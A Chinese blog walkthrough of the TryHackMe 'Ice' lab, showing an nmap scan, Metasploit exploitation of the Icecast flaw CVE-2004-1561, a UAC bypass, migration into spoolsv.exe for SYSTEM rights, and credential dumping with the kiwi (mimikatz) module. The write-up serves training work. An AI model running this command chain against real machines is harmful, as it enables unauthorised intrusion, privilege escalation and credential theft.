tryhackme-Ice

于 2022-12-31 15:56:22 发布
阅读量124 收藏 1
点赞数
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: windows 网络安全 metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/128506149
版权

Ice

部署并入侵Windows机器,利用安全性非常低的媒体服务器。

循例 nmap扫

nmap -sS 10.10.163.66 -Pn -p- -T5

.

135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
5357/tcp  open  wsdapi
8000/tcp  open  http-alt
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49158/tcp open  unknown
49159/tcp open  unknown
49160/tcp open  unknown

想要回答题目的问题只需加 -sV -sC即可

寻找icecast相关cve:

CVE-2004-1561

开启metasploit

search CVE-2004-1561
use 0

设置相关参数并运行

权限提升

在meterpreter下运行post模块的内核漏洞扫描:

run post/multi/recon/local_exploit_suggester

metasploit返回了几个存在的漏洞,我们寻找能够帮助我们提权的:

exploit/windows/local/bypassuac_eventvwr

background后台运行

use exploit/windows/local/bypassuac_eventvwr
show options
sessions -l
set session 2
set lhost ...
set lport ...
exploit

在meterpreter下运行:getprivs

我们可以看到拥有许多特权

凭据收集

转储到打印机进程:

migrate -N spoolsv.exe

此时我们将获得system权限

加载kiwi模块(mimikatz合并到了此模块中)

load kiwi
help
creds_all

即可获得所有凭据

题目的问题可以自行查阅meterpreter shell的help

Sugobet
关注
专栏目录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值